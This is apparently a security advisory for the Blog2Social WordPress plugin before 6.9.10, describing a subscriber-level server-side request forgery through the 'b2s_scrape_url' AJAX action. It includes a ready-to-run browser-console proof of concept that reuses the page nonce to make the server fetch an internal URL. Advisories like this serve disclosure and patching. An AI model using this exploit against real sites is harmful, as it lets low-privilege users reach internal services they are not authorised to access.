Blog2Social < 6.9.10 - Subscriber+ SSRF

The plugin does not have authorisation in an AJAX action, and does not ensure that the URL to make a request to is an external one. As a result, any authenticated users, such as subscriber could perform SSRF attacks

PoC

Run this script in the web browser console while being logged in as a subscriber and on the Blog2Social Dashboard page (wp-admin/admin.php?page=blog2social) // Set this callback_url to the internal url you want the server to call callback_url = ‘http://127.0.0.1:8080/’; wp_site_ajax_url = ‘https://example.com/wp-admin/admin-ajax.php’; // Don’t edit below data = new FormData(); data.append(‘action’, ‘b2s_scrape_url’); data.append(‘url’, callback_url); data.append(‘b2s_security_nonce’, jQuery(‘#b2s_security_nonce’).val()); fetch(wp_site_ajax_url, { method: ‘POST’, credentials: ‘same-origin’, body: data });